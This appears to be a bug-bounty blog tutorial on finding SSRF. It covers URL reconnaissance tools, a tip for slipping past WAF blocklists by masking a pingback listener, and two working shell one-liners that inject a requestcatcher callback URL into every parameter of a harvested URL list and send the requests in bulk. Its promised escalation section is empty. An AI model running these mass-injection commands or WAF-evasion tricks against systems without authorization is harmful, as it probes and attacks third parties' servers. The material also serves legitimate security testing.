Server-Side Request Forgery (SSRF) is a critical vulnerability that occurs when an attacker forces a server-side application to make HTTP requests to an unintended destination. Essentially, the attacker uses the vulnerable server as a proxy to bypass network security controls.

Phase 1: The Recon Aggregation

The first step to finding SSRF is having a massive pool of URLs to test. I won't walk you through the urls collection — being "handy" with open source tools is part of your job — but here is the stack you should be using to build your allurls.txt:

  • Passive Discovery: waymore, gau, gauplus, waybackurls, urlscan alienvault and virustotal
  • Active Discovery: Burpsuite active scan web crawling, haktrails, katana, and gospider.

Phase 2: The Setup (Bypassing the WAF)

To confirm an SSRF, you need a pingback server.

  • Common Choice: interactsh.
  • Pro Tip: Many WAFs (Web Application Firewalls) blacklist interact.sh domains. To bypass this, use tinyurl or requestcatcher.com to mask your listener.

Phase 3: Targeted Parameter Injection

The key to successful automation is tracking. If you blast 10,000 URLs and get one hit, you need to know exactly which URL triggered it.

Technique 1: Protocol-Specific Replacement

This regex targets parameters that specifically look like they contain a URL (starting with http or https). It appends a unique ID (e.g., emon1, emon2 , emon3 …) to each request so you can map the hit back to the source URL.

None

Bash

cat allurls.txt | gawk 'BEGIN{c=1}{s=$0;out="";while(match(s,/([?&][^=]+=)(https?:\/\/|https?%3A%2F%2F)([^\/&?]+)([^&]*)/,m)){proto=(tolower(m[2])~/^https/?"https://":"http://"); out=out substr(s,1,RSTART-1) m[1] proto "ashiquremon.requestcatcher.com/emon" c m[4]; c++; s=substr(s,RSTART+RLENGTH)}; print out s}' |grep -i requestcatcher | httpx -silent -fr
here is the pingback poc in the ss given below
None

Technique 2: Blind Parameter Injection

Sometimes, parameters that don't look like URLs are still vulnerable. This command replaces every parameter value with your pingback URL.

None

Bash

cat allurls.txt | awk 'BEGIN{c=1} {split($0,a,"\\?"); domain=a[1]; if(length(a)>1){split(a[2],p,"&"); for(i in p){sub(/=.*/,"=https://ashiquremon.requestcatcher.com/emon" c,p[i]); c++;} out=domain"?"p[1]; for(i=2;i<=length(p);i++) out=out"&"p[i]; print out} else print domain}'|grep -i requestcatcher | httpx -silent -fr

Pro Tip: If you see your own IP address in the logs, it is an Open Redirect try to escalate it to Account takeover . If you see the server's IP or a local address, you've found a potential SSRF.

Phase 4: Escalation (The "Pro" in the Title)

A simple HTTP pingback is often marked as Low or Informative. To get that Critical bounty, you must demonstrate impact:

Thanks for reading